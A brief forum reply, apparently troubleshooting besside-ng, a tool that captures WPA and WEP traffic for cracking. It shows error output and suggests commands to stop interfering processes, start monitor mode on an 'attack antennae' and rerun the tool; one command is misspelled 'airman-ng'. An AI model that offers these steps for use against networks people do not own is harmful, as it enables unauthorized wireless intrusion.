ioctl(SIOCSIWMODE) failed: Device or resource busy
07:54:42 Let's ride
07:54:42 Resuming from besside.log
07:54:42 Appending to wpa.cap
07:54:42 Appending to wep.cap
07:54:42 Logging to besside.log
besside-ng: wi_read(): No child processes

airmon-ng check kill

If wlan1 is your attack antennae try:-

airman-ng start wlan1
then
besside-ng wlan1

Share Your Thoughts

  • Hot
  • Latest